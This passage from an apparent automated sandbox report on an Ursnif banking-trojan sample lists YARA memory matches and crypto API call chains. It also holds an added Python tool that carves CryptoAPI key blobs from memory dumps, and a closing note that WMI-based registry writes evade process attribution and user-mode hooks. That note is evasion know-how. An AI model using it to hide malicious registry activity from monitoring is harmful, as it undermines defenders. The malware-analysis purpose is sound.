                      Source: Yara match; File source: 00000000.00000003.408114811.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000006.00000003.441574566.0000000004DA9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000005.00000003.392684354.0000000004AD0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000002.00000003.379823360.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000002.1031847284.0000000003099000.00000004.00000040.sdmp, type: MEMORY

                      E-Banking Fraud:

                      Yara detected Ursnif
                      Source: Yara match; File sources: the same memory dumps, process memory spaces and unpacked PE images listed for this signature under Key, Mouse, Clipboard, Microphone and Screen Capturing above
                      Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_00F33FAB CryptAcquireContextW, memcpy, CryptImportKey, CryptSetKeyParam, memcpy, CryptEncrypt, CryptDecrypt, GetLastError, GetLastError, CryptDestroyKey, GetLastError, CryptReleaseContext, GetLastError, 0_2_00F33FAB
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 3_2_032E3FAB CryptAcquireContextW, memcpy, CryptImportKey, CryptSetKeyParam, memcpy, CryptEncrypt, CryptDecrypt, GetLastError, GetLastError, CryptDestroyKey, GetLastError, CryptReleaseContext, GetLastError, 3_2_032E3FAB
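The two code functions above chain CryptAcquireContextW, memcpy, CryptImportKey, CryptSetKeyParam and CryptEncrypt/CryptDecrypt. CryptImportKey accepts only a CryptoAPI key blob that begins with a BLOBHEADER, so the buffer the preceding memcpy fills is such a blob and can be carved from the process memory dumps this report lists. The Python below is an added example by this editor, not code from the report or from the sample: it parses the two blob layouts a reverser most often meets (PLAINTEXTKEYBLOB carrying a symmetric key, and an RSA PUBLICKEYBLOB) and scans a buffer for them. The report does not state which blob type or algorithm this sample imports, so the embedded dump is constructed and the accepted key sizes are the editor's sanity bounds.

```python
from __future__ import annotations

import struct

# CryptoAPI constants from wincrypt.h
CUR_BLOB_VERSION = 2
PUBLICKEYBLOB = 0x06
PLAINTEXTKEYBLOB = 0x08
RSA1_MAGIC = 0x31415352  # "RSA1" in RSAPUBKEY.magic
ALG_IDS = {
    0x6601: "CALG_DES", 0x6602: "CALG_RC2", 0x6603: "CALG_3DES",
    0x660E: "CALG_AES_128", 0x660F: "CALG_AES_192", 0x6610: "CALG_AES_256",
    0x6801: "CALG_RC4", 0xA400: "CALG_RSA_KEYX", 0x2400: "CALG_RSA_SIGN",
}


def parse_key_blob(buf: bytes) -> dict | None:
    """Parse BLOBHEADER {bType, bVersion, reserved, aiKeyAlg} plus the body of a
    PLAINTEXTKEYBLOB or RSA PUBLICKEYBLOB. Returns None if buf is not one."""
    if len(buf) < 8:
        return None
    b_type, version, reserved, alg = struct.unpack_from("<BBHI", buf, 0)
    if version != CUR_BLOB_VERSION or reserved != 0 or alg not in ALG_IDS:
        return None
    info = {"alg": ALG_IDS[alg]}
    if b_type == PLAINTEXTKEYBLOB:
        # body: DWORD dwKeySize followed by the raw key bytes
        if len(buf) < 12:
            return None
        key_len = struct.unpack_from("<I", buf, 8)[0]
        # editor's sanity bound: symmetric keys are 5..64 bytes in practice
        if not 5 <= key_len <= 64 or len(buf) < 12 + key_len:
            return None
        info.update(type="PLAINTEXTKEYBLOB", key=buf[12:12 + key_len], size=12 + key_len)
    elif b_type == PUBLICKEYBLOB:
        # body: RSAPUBKEY {magic, bitlen, pubexp} followed by the little-endian modulus
        if len(buf) < 20:
            return None
        magic, bitlen, pubexp = struct.unpack_from("<III", buf, 8)
        if magic != RSA1_MAGIC or bitlen % 8 or not 512 <= bitlen <= 16384:
            return None
        n_len = bitlen // 8
        if len(buf) < 20 + n_len:
            return None
        info.update(type="PUBLICKEYBLOB", bits=bitlen, exponent=pubexp,
                    modulus=int.from_bytes(buf[20:20 + n_len], "little"),
                    size=20 + n_len)
    else:
        return None
    return info


def scan_for_key_blobs(dump: bytes) -> list[tuple[int, dict]]:
    """Try every offset; the version byte and reserved word are a cheap prefilter."""
    hits = []
    for off in range(len(dump) - 8):
        if dump[off + 1] != CUR_BLOB_VERSION or dump[off + 2:off + 4] != b"\x00\x00":
            continue
        info = parse_key_blob(dump[off:])
        if info is not None:
            hits.append((off, info))
    return hits


# Builders used only to construct the sample dump below.
def build_plaintext_key_blob(alg: int, key: bytes) -> bytes:
    return (struct.pack("<BBHI", PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, alg)
            + struct.pack("<I", len(key)) + key)


def build_rsa_public_blob(modulus: int, pubexp: int = 65537) -> bytes:
    n_len = (modulus.bit_length() + 7) // 8
    return (struct.pack("<BBHI", PUBLICKEYBLOB, CUR_BLOB_VERSION, 0, 0xA400)
            + struct.pack("<III", RSA1_MAGIC, n_len * 8, pubexp)
            + modulus.to_bytes(n_len, "little"))


# Constructed memory region (not from the report): filler, an AES-128 key blob,
# more filler, a 512-bit RSA public key blob, trailing filler.
SAMPLE_KEY = bytes(range(0x10, 0x20))
SAMPLE_MODULUS = (1 << 511) | 0x10001
SAMPLE_DUMP = (b"\x00" * 37 + build_plaintext_key_blob(0x660E, SAMPLE_KEY)
               + b"\xCC" * 100 + build_rsa_public_blob(SAMPLE_MODULUS) + b"\x00" * 20)

if __name__ == "__main__":
    for off, info in scan_for_key_blobs(SAMPLE_DUMP):
        print(f"0x{off:04x}: {info['type']} {info['alg']}")
        if "key" in info:
            print("   key:", info["key"].hex())
        else:
            print(f"   modulus bits: {info['bits']}, e={info['exponent']}")
```

Run it against a `.sdmp` region from the report instead of `SAMPLE_DUMP` to look for the blob that CryptImportKey consumed; a PLAINTEXTKEYBLOB hit gives the symmetric key directly, while a PUBLICKEYBLOB hit only gives the public half, which is what a sample uses to verify signed responses rather than to decrypt them.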

                      System Summary:

                      Writes or reads registry keys via WMI
                      Source: C:\Windows\System32\loaddll32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exe; WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
                      Note: StdRegProv runs inside the WMI provider host, so the registry key and values created here are written by WmiPrvSE.exe on behalf of loaddll32.exe; registry auditing and Sysmon registry events (Event ID 12/13) attribute them to WmiPrvSE.exe, and user-mode hooks on RegSetValueEx in the calling process never see them.